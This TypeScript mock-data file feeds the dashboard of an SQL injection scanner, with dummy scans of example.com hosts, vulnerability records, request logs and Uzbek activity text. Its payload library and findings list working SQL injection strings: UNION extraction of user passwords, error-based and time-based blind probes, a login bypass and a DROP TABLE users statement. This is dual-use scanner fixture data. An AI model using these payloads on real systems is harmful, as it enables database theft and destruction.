import type {
  Scan,
  Vulnerability,
  Payload,
  Request,
  SystemStatus,
  AnalyticsData,
} from './types';

export const dummyScans: Scan[] = [
  {
    id: 'scan-001',
    targetUrl: 'https://example.com/login',
    status: 'completed',
    timestamp: new Date(Date.now() - 2 * 60 * 60 * 1000),
    vulnerabilitiesFound: 3,
    requestsTotal: 245,
    successRate: 92,
    duration: 45,
    depth: 3,
  },
  {
    id: 'scan-002',
    targetUrl: 'https://shop.example.com/products',
    status: 'completed',
    timestamp: new Date(Date.now() - 4 * 60 * 60 * 1000),
    vulnerabilitiesFound: 1,
    requestsTotal: 156,
    successRate: 88,
    duration: 32,
    depth: 2,
  },
  {
    id: 'scan-003',
    targetUrl: 'https://api.example.com/search',
    status: 'completed',
    timestamp: new Date(Date.now() - 6 * 60 * 60 * 1000),
    vulnerabilitiesFound: 5,
    requestsTotal: 312,
    successRate: 95,
    duration: 58,
    depth: 4,
  },
  {
    id: 'scan-004',
    targetUrl: 'https://admin.example.com/dashboard',
    status: 'scanning',
    timestamp: new Date(Date.now() - 15 * 60 * 1000),
    vulnerabilitiesFound: 2,
    requestsTotal: 89,
    successRate: 91,
    duration: 0,
    depth: 3,
  },
  {
    id: 'scan-005',
    targetUrl: 'https://form.example.com/contact',
    status: 'failed',
    timestamp: new Date(Date.now() - 24 * 60 * 60 * 1000),
    vulnerabilitiesFound: 0,
    requestsTotal: 45,
    successRate: 0,
    duration: 12,
    depth: 2,
  },
];

export const dummyVulnerabilities: Vulnerability[] = [
  {
    id: 'vuln-001',
    scanId: 'scan-001',
    url: 'https://example.com/login',
    parameter: 'username',
    payload: "' OR '1'='1",
    payloadType: 'Boolean-based',
    riskScore: 92,
    severity: 'Critical',
    errorPattern: "Unexpected error in query execution",
    responseTime: 1250,
    timestamp: new Date(Date.now() - 2 * 60 * 60 * 1000),
    evidence: 'Database error message exposed in response',
  },
  {
    id: 'vuln-002',
    scanId: 'scan-001',
    url: 'https://example.com/login',
    parameter: 'password',
    payload: "1' UNION SELECT NULL,NULL,NULL--",
    payloadType: 'Union-based',
    riskScore: 88,
    severity: 'Critical',
    errorPattern: 'Column count mismatch',
    responseTime: 1450,
    timestamp: new Date(Date.now() - 2 * 60 * 60 * 1000),
    evidence: 'UNION injection confirmed',
  },
  {
    id: 'vuln-003',
    scanId: 'scan-001',
    url: 'https://example.com/login',
    parameter: 'email',
    payload: "' AND SLEEP(5)--",
    payloadType: 'Time-based',
    riskScore: 76,
    severity: 'High',
    errorPattern: 'Response delayed by 5+ seconds',
    responseTime: 5200,
    timestamp: new Date(Date.now() - 2 * 60 * 60 * 1000),
    evidence: 'Time-based blind injection detected',
  },
  {
    id: 'vuln-004',
    scanId: 'scan-002',
    url: 'https://shop.example.com/products',
    parameter: 'id',
    payload: "1 OR 1=1",
    payloadType: 'Error-based',
    riskScore: 64,
    severity: 'High',
    errorPattern: 'MySQL syntax error',
    responseTime: 890,
    timestamp: new Date(Date.now() - 4 * 60 * 60 * 1000),
    evidence: 'Error-based SQLi with database information disclosure',
  },
  {
    id: 'vuln-005',
    scanId: 'scan-003',
    url: 'https://api.example.com/search',
    parameter: 'query',
    payload: "'; DROP TABLE users;--",
    payloadType: 'Error-based',
    riskScore: 95,
    severity: 'Critical',
    errorPattern: 'Syntax error near DROP',
    responseTime: 2100,
    timestamp: new Date(Date.now() - 6 * 60 * 60 * 1000),
    evidence: 'Dangerous payload execution possible',
  },
];

export const dummyPayloads: Payload[] = [
  // Error-based
  {
    id: 'payload-001',
    type: 'Error-based',
    payload: "' AND extractvalue(1,concat(0x7e,(select @@version)))-- ",
    successRate: 78,
    description: 'MySQL extractvalue error injection',
    category: 'MySQL',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-002',
    type: 'Error-based',
    payload: "' AND updatexml(1,concat(0x7e,(SELECT @@version)),1)-- ",
    successRate: 75,
    description: 'MySQL updatexml error injection',
    category: 'MySQL',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-003',
    type: 'Error-based',
    payload: "' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT @@version)),0x7e,FLOOR(RAND(0)*2))a GROUP BY a)-- ",
    successRate: 68,
    description: 'MySQL GROUP BY error injection',
    category: 'MySQL',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-004',
    type: 'Error-based',
    payload: "'; SELECT CAST(CAST((SELECT version()) AS NUMERIC) AS TEXT)-- ",
    successRate: 72,
    description: 'PostgreSQL CAST error injection',
    category: 'PostgreSQL',
    enabled: true,
    createdAt: new Date(),
  },

  // Union-based
  {
    id: 'payload-005',
    type: 'Union-based',
    payload: "' UNION SELECT NULL,NULL,NULL,NULL,NULL-- ",
    successRate: 85,
    description: '5-column UNION injection',
    category: 'Generic',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-006',
    type: 'Union-based',
    payload: "' UNION SELECT table_name,column_name,3,4,5 FROM information_schema.columns-- ",
    successRate: 82,
    description: 'UNION-based information extraction',
    category: 'MySQL',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-007',
    type: 'Union-based',
    payload: "1' UNION SELECT username,password,3,4,5 FROM users-- ",
    successRate: 88,
    description: 'User data extraction via UNION',
    category: 'MySQL',
    enabled: false,
    createdAt: new Date(),
  },

  // Boolean-based
  {
    id: 'payload-008',
    type: 'Boolean-based',
    payload: "' AND '1'='1",
    successRate: 92,
    description: 'Simple boolean true condition',
    category: 'Generic',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-009',
    type: 'Boolean-based',
    payload: "' AND 1=1-- ",
    successRate: 90,
    description: 'Comment-based boolean injection',
    category: 'Generic',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-010',
    type: 'Boolean-based',
    payload: "' AND (SELECT COUNT(*) FROM users) > 0-- ",
    successRate: 87,
    description: 'Subquery-based boolean blind',
    category: 'Generic',
    enabled: true,
    createdAt: new Date(),
  },

  // Time-based
  {
    id: 'payload-011',
    type: 'Time-based',
    payload: "' AND SLEEP(5)-- ",
    successRate: 79,
    description: 'MySQL SLEEP time-based blind',
    category: 'MySQL',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-012',
    type: 'Time-based',
    payload: "' AND BENCHMARK(5000000,SHA1('blind'))-- ",
    successRate: 76,
    description: 'MySQL BENCHMARK time-based blind',
    category: 'MySQL',
    enabled: true,
    createdAt: new Date(),
  },
  {
    id: 'payload-013',
    type: 'Time-based',
    payload: "'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE 0 END-- ",
    successRate: 81,
    description: 'PostgreSQL pg_sleep time-based',
    category: 'PostgreSQL',
    enabled: true,
    createdAt: new Date(),
  },
];

export const dummyRequests: Request[] = [
  {
    id: 'req-001',
    scanId: 'scan-004',
    method: 'GET',
    url: 'https://admin.example.com/dashboard?id=1',
    parameters: { id: '1' },
    payload: "' OR '1'='1",
    response: 'Server error: Unexpected token in query',
    responseTime: 1245,
    statusCode: 500,
    timestamp: new Date(Date.now() - 10 * 60 * 1000),
    detected: true,
  },
  {
    id: 'req-002',
    scanId: 'scan-004',
    method: 'POST',
    url: 'https://admin.example.com/dashboard',
    parameters: { action: 'login', user: 'admin' },
    payload: "admin' --",
    response: 'SELECT * FROM users WHERE username = admin',
    responseTime: 1100,
    statusCode: 500,
    timestamp: new Date(Date.now() - 9 * 60 * 1000),
    detected: true,
  },
  {
    id: 'req-003',
    scanId: 'scan-004',
    method: 'GET',
    url: 'https://admin.example.com/dashboard?search=test',
    parameters: { search: 'test' },
    payload: 'test',
    response: 'Results for test: 0 items found',
    responseTime: 234,
    statusCode: 200,
    timestamp: new Date(Date.now() - 8 * 60 * 1000),
    detected: false,
  },
];

export const systemStatus: SystemStatus = {
  cpuUsage: 34,
  memoryUsage: 58,
  activeSessions: 12,
  uptime: 426000, // 5 days
  lastUpdate: new Date(),
};

export const analyticsData: AnalyticsData = {
  totalScans: 47,
  totalVulnerabilities: 23,
  criticalCount: 8,
  highCount: 9,
  mediumCount: 4,
  lowCount: 2,
  averageResponseTime: 1156,
  successRate: 91,
};

// Recent activity log
export const recentActivity = [
  {
    id: 'activity-001',
    type: 'scan_completed',
    description: 'https://api.example.com/search uchun skanerlash yakunlandi',
    timestamp: new Date(Date.now() - 6 * 60 * 60 * 1000),
    status: 'success',
  },
  {
    id: 'activity-002',
    type: 'vulnerability_detected',
    description: '`query` parametrida kritik SQL injection topildi',
    timestamp: new Date(Date.now() - 6 * 60 * 60 * 1000),
    status: 'critical',
  },
  {
    id: 'activity-003',
    type: 'scan_started',
    description: 'https://admin.example.com/dashboard uchun skanerlash boshlandi',
    timestamp: new Date(Date.now() - 15 * 60 * 1000),
    status: 'info',
  },
  {
    id: 'activity-004',
    type: 'report_generated',
    description: '2024-03-14-001 hisobot generatsiya qilindi va eksport qilindi',
    timestamp: new Date(Date.now() - 2 * 60 * 60 * 1000),
    status: 'success',
  },
  {
    id: 'activity-005',
    type: 'payload_updated',
    description: "Payload kutubxonasi yangilandi (5 ta yangi)",
    timestamp: new Date(Date.now() - 24 * 60 * 60 * 1000),
    status: 'info',
  },
];

export const localizedRecentActivity = [
  {
    id: 'activity-001',
    type: 'scan_completed',
    description: 'https://api.example.com/search uchun skanerlash muvaffaqiyatli yakunlandi',
    timestamp: new Date(Date.now() - 6 * 60 * 60 * 1000),
    status: 'success',
  },
  {
    id: 'activity-002',
    type: 'vulnerability_detected',
    description: '`query` parametrida kritik SQL injection aniqlandi',
    timestamp: new Date(Date.now() - 6 * 60 * 60 * 1000),
    status: 'critical',
  },
  {
    id: 'activity-003',
    type: 'scan_started',
    description: 'https://admin.example.com/dashboard uchun skanerlash boshlandi',
    timestamp: new Date(Date.now() - 15 * 60 * 1000),
    status: 'info',
  },
  {
    id: 'activity-004',
    type: 'report_generated',
    description: '2024-03-14-001 hisobot generatsiya qilindi va eksport qilildi',
    timestamp: new Date(Date.now() - 2 * 60 * 60 * 1000),
    status: 'success',
  },
  {
    id: 'activity-005',
    type: 'payload_updated',
    description: "Payload kutubxonasi yangilandi: 5 ta yangi payload qo'shildi",
    timestamp: new Date(Date.now() - 24 * 60 * 60 * 1000),
    status: 'info',
  },
];

export const aiInsightTemplates = [
  {
    id: 'insight-001',
    title: 'Kritik parametrlarni ustuvor tekshirish',
    description: 'AI modul login, search va filter endpointlaridagi user-controlled parametrlarni birinchi bosqichda ajratadi.',
    impact: 'Yuqori xavfli nuqtalar erta topiladi va skan vaqti samaraliroq taqsimlanadi.',
  },
  {
    id: 'insight-002',
    title: 'Time-based thresholdni dinamik sozlash',
    description: 'Endpointning bazaviy kechikishiga qarab sleep-based payloadlar uchun adaptiv trigger ishlatiladi.',
    impact: 'False positive holatlar kamayadi, ayniqsa sekin API lar bilan ishlaganda.',
  },
  {
    id: 'insight-003',
    title: 'Patch tavsiyalarini avtomatik tayyorlash',
    description: "Topilgan zaiflikka mos parametrized query, ORM safeguards va input validation bo'yicha tavsiyalar tayyorlanadi.",
    impact: "Security va backend jamoasi o'rtasidagi handoff tezlashadi.",
  },
];
